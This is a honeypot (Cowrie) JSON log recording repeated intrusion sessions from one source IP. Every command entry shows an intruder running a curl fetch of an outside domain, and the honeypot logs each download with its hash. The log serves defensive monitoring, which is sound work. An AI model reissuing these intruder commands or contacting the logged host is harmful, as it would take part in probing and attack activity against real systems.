{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:32.413017Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:32.414419Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:32.415475Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:32.416922Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:32.417454Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:32.421350Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:32.425417Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:32.427917Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:32.457677Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:32.458529Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:32.460807Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:32.461623Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:32.464670Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:32.466185Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:32.466882Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:32.473054Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:32.475262Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:32.508152Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:32.509083Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:32.512207Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:32.513796Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:32.516239Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:32.517372Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:32.522559Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:32.529048Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:32.531865Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:32.559755Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:32.561839Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:32.562623Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:32.564856Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:32.565819Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:32.567623Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:32.568350Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:32.573243Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:32.576312Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:32.608212Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:32.608875Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:32.610487Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:32.611631Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:32.614743Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:32.616541Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:32.617567Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:32.621797Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:32.625015Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:32.690913Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:32.691682Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:32.693465Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:32.694424Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:32.696483Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:32.697330Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:32.702586Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:32.707549Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:32.711123Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:32.743215Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:32.744000Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:32.749446Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:32.753098Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:32.755698Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:32.758206Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:32.758718Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:32.777275Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:32.778596Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:32.779318Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:32.785811Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:32.788846Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:32.792245Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:32.793258Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:32.794143Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:32.815075Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:32.816091Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:32.820384Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:32.821196Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:32.826584Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:32.829822Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:32.831231Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:32.832040Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:32.859006Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"8458ef53750b"}
